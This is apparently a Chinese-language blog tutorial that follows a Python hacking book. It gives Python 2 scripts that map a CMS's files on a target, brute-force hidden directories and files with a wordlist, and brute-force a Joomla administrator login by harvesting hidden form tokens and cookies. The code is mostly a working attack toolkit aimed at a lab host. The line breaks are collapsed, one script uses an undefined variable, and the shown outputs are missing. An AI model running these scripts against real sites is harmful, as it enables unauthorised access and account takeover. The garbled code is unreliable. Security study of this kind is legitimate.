Web的套接字函数库:urllib2
一开始以urllib2.py命名脚本,在Sublime Text中运行会出错,纠错后发现是重名了,改过来就好:
#!/usr/bin/python#coding=utf-8import urllib2url = ""headers = {}headers['User-Agent'] = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/0101 Firefox/52.0"request = urllib2.Request(url,headers=headers)response = urllib2.urlopen(request)print response.read()response.close()# body = urllib2.urlopen("")# print body.read()
运行结果:
放在Python的shell环境中运行:
注意到由于有中文,所以为了避免出现乱码就在调用了read()函数之后再调用decode("utf-8")来进行utf-8的字符解密。
开源Web应用安装:
这里的前提是Web服务器使用的是开源CMS来建站的,而且自己也下载了一套相应的开源代码。
这里使用盾灵的CMS吧,可以直接在网上下载,其界面如图:
接着直接上代码吧:
#!/usr/bin/python#coding=utf-8import Queueimport threadingimport osimport urllib2threads = 10target = "http://10.10.10.144/dunling"directory = "/dunling"filters = [".jpg",".gif",".png",".css"]os.chdir(directory)web_paths = Queue.Queue()for r,d,f in os.walk("."):for files in f:remote_path = "%s/%s"%(r,files)if remote_path.startswith("."):remote_path = remote_path[1:]if os.path.splitext(files)[1] not in filters:web_paths.put(remote_path)def test_remote():while not web_paths.empty():path = web_paths.get()url = "%s%s"%(target,path)request = urllib2.Request(url)try:response = urllib2.urlopen(request)content = response.read()print "[%d] => %s"%(response.code,path)response.close()except urllib2.HTTPError as error:# print "Failed %s"%error.codepassfor i in range(threads):print "Spawning thread : %d"%it = threading.Thread(target=test_remote)t.start()
运行结果:
暴力破解目录和文件位置:
先下载SVNDigger的第三方暴力破解工具的字典:/blog/web-security/svn-digger-better-lists-for-forced-browsing/
将其中的all.txt文件放到相应的目录以备调用,这里就和示例一样放到/tmp目录中。
#!/usr/bin/python#coding=utf-8import urllib2import threadingimport Queueimport urllibthreads = 50target_url = ""wordlist_file = "/tmp/all.txt" # from SVNDiggerresume = Noneuser_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/0101 Firefox/52.0"def build_wordlist(wordlist_file):#读入字典文件fd = open(wordlist_file,"rb")raw_words = fd.readlines()fd.close()found_resume = Falsewords = Queue.Queue()for word in raw_words:word = word.rstrip()if resume is not None:if found_resume:words.put(word)else:if word == resume:found_resume = Trueprint "Resuming wordlist from: %s"%resumeelse:words.put(word)return wordsdef dir_bruter(word_queue,extensions=None):while not word_queue.empty():attempt = word_queue.get()attempt_list = []#检测是否有文件扩展名,若没有则就是要暴力破解的路径if "." not in attempt:attempt_list.append("/%s/"%attempt)else:attempt_list.append("/%s"%attempt)#如果我们想暴破扩展if extensions:for extension in extensions:attempt_list.append("/%s%s"%(attempt,extension))#迭代我们要尝试的文件列表for brute in attempt_list:url = "%s%s"%(target_url,urllib.quote(brute))try:headers = {}headers["User-Agent"] = user_agentr = urllib2.Request(url,headers=headers)response = urllib2.urlopen(r)if len(response.read()):print "[%d] => %s"%(response.code,url)except urllib2.URLError, e:if hasattr(e,'code') and e.code != 404:print "!!! %d => %s"%(e.code,url)password_queue = build_wordlist(wordlist_file)extensions = [".php",".bak",".orig",".inc"]for i in range(threads):t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))t.start()
运行结果:
暴力破解HTML表格认证:
先下载Joomla,安装后之后到后台登陆页面:
右键查看源代码,分析表单的关键信息:
可以看到,在表单中input标签下代表用户名和密码的变量的名称为username和passwd;在form标签最后的地方有一个长整型的随机字符串,这时Joomla对抗暴力破解技术的关键,会在当前的用户会话中通过存储在cookie中进行检测;登录成功的对比字符串是页面返回的title的内容,即“Administration - Control Panel”。
所以,书上作者也给出了爆破Joomla的流程:
1、检索登录页面,接受所有返回的cookies值;
2、从HTML中获取所有表单元素;
3、在你的字典中设置需要猜测的用户名和密码;
4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单文件和存储的cookies值;
5、测试是否能登录成功。
代码如下:
#!/usr/bin/python#coding=utf-8import urllib2import urllibimport cookielibimport threadingimport sysimport Queuefrom HTMLParser import HTMLParser#简要设置user_thread = 10username = "admin"wordlist_file = "/tmp/passwd.txt"resume = None#特定目标设置target_url = "http://10.10.10.144/Joomla/administrator/index.php"target_post = "http://10.10.10.144/Joomla/administrator/index.php"username_field = "username"password_field = "passwd"success_check = "Administration - Control Panel"class Bruter(object):"""docstring for Bruter"""def __init__(self, username, words):self.username = usernameself.password_q = wordsself.found = Falseprint "Finished setting up for: %s"%usernamedef run_bruteforce(self):for i in range(user_thread):t = threading.Thread(target=self.web_bruter)t.start()def web_bruter(self):while not self.password_q.empty() and not self.found:brute = self.password_q.get().rstrip()jar = cookielib.FileCookieJar("cookies")opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))response = opener.open(target_url)page = response.read()print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize())#解析隐藏区域parser = BruteParser()parser.feed(page)post_tags = parser.tag_results#添加我们的用户名和密码区域post_tags[username_field] = self.usernamepost_tags[password_field] = brutelogin_data = urllib.urlencode(post_tags)login_response = opener.open(target_post,login_data)login_result = login_response.read()if success_check in login_result:self.found = Trueprint "[*] Bruteforce successful. "print "[*] Username: %s"%self.usernameprint "[*] Password: %s"%bruteprint "[*] Waiting for other threads to exit ... "class BruteParser(HTMLParser):"""docstring for BruteParser"""def __init__(self):HTMLParser.__init__(self)self.tag_results = {}def handle_starttag(self,tag,attrs):if tag == "input":tag_name = Nonetag_value = Nonefor name,value in attrs:if name == "name":tag_name = valueif name == "value":tag_value = valueif tag_name is not None:self.tag_results[tag_name] = valuedef build_wordlist(wordlist_file):fd = open(wordlist_file,"rb")raw_words = fd.readlines()fd.close()found_resume = Falsewords = Queue.Queue()for word in raw_words:word = word.rstrip()if resume is not None:if found_resume:words.put(word)else:if word == resume:found_resume = Trueprint "Resuming wordlist from: %s"%resumeelse:words.put(word)return wordswords = build_wordlist(wordlist_file)brute_obj = Bruter(username,words)brute_obj.run_bruteforce()
这里主要导入cookielib库,调用其FileCookieJar()函数来将cookie值存储在cookies文件中,并通过urllib2库的HTTPCookieProcessor()函数来进行cookie处理再返回给urllib2库的build_opener()函数创建自定义opener对象使之具有支持cookie的功能。
运行结果:
